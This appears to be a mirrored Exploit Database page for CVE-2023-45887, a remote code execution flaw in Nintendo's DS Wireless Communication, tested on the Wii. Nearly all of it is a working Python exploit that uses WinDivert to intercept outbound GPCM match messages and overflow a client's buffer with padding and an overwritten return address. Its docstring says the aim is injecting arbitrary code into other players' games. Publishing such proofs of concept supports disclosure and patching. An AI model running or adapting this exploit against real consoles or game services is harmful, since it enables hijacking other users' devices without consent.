DS Wireless Communication – Remote Code Execution

• Exploit Database
• 43 阅读

• 作者： MikeIsAStar
  日期： 2024-02-15
• 类别：

  • local
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51798/

• # Exploit Title: DS Wireless Communication Remote Code Execution
  # Date: 11 Oct 2023
  # Exploit Author: MikeIsAStar
  # Vendor Homepage: https://www.nintendo.com
  # Version: Unknown
  # Tested on: Wii
  # CVE: CVE-2023-45887
  
  """This code will inject arbitrary code into a client's game.
  
  You are fully responsible for all activity that occurs while using this code.
  The author of this code can not be held liable to you or to anyone else as a
  result of damages caused by the usage of this code.
  """
  
  import re
  import sys
  
  try:
  import pydivert
  except ModuleNotFoundError:
  sys.exit("The 'pydivert' module is not installed !")
  
  
  # Variables
  LR_SAVE = b'\x41\x41\x41\x41'
  assert len(LR_SAVE) == 0x04
  PADDING = b'MikeStar'
  assert len(PADDING) > 0x00
  
  # Constants
  DWC_MATCH_COMMAND_INVALID = b'\xFE'
  PADDING_LENGTH = 0x23C
  FINAL_KEY = b'\\final\\'
  WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
  
  
  def try_modify_payload(payload):
  message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
  message = re.search(message_pattern, payload)
  if not message:
  return None
  
  payload = payload[:message.end()]
  payload += DWC_MATCH_COMMAND_INVALID
  payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
  payload += LR_SAVE
  payload += FINAL_KEY
  return payload
  
  
  def main():
  try:
  with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
  for packet in packet_buffer:
  payload = try_modify_payload(packet.payload)
  if payload is not None:
  print('Modified a GPCM message !')
  packet.payload = payload
  packet_buffer.send(packet)
  except KeyboardInterrupt:
  pass
  except PermissionError:
  sys.exit('This program must be run with administrator privileges !')
  
  
  if __name__ == '__main__':
  main()